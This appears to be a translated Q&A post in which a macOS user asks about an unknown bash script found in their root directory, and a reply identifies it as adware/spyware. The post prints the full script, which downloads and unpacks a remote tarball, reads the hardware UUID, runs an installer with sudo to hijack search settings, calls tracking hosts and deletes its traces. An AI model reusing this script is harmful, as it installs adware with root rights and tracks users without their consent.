Macos 在我的根目录上找到一个文件不确定它是什么?
我正在使用一个终端,在我的根目录中找到了这个名为“file”(bash)的代码文件。这个文件坏了吗,我不知道它在做什么,它把我吓坏了Macos 在我的根目录上找到一个文件不确定它是什么?,macos,security,root,Macos,Security,Root,我正在使用一个终端,在我的根目录中找到了这个名为“file”(bash)的代码文件。这个文件坏了吗,我不知道它在做什么,它把我吓坏了 func_4(){ /bin/mkdir -p /var/tmp /usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.onlinemacupdate.com/static/sr/sr_v2.tgz" /usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp cd /var/tmp/d
func_4(){
/bin/mkdir -p /var/tmp
/usr/bin/curl -s -L -o /var/tmp/sr.tgz
"http://c.onlinemacupdate.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0,
line, "\""); printf("%s\n", line[4]); }')
COUNTRY="US"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ]
|| [ "$COUNTRY" == "NZ" ]\
|| [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ]
|| [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
|| [ "$COUNTRY" == "DE" ]; then
sudo ./setup.sh "http://www.searchitdown.com/?
n=006&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?
n=006&searchsource=69&UM=8&gd=SY1000653"
"http://www.searchitdown.com/Results.aspx?
n=006&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd"
"http://i.firstinstallmac.club/c/cc?id="
else
sudo ./setup.sh "http://feed.snowbitt.com/
publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp
&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/?
publisher=TingSyn&ts=sy&barcodeid=51222999&
searchtype=nt&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/?
publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&
type=TGE_5a01fc" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id="
fi
CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
/usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i="
fi
func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
f unc_taaVqst &
}
func_4 &
这段代码在做什么?这不好吗?删除它。如前所述,它是广告软件和间谍软件。简而言之,它从网站下载内容并以root用户身份运行。我想它会安装后门并建立到服务器的控制通道。您应该尝试找出它是如何到达那里的(被利用了什么),然后在没有漏洞的情况下重新安装服务器。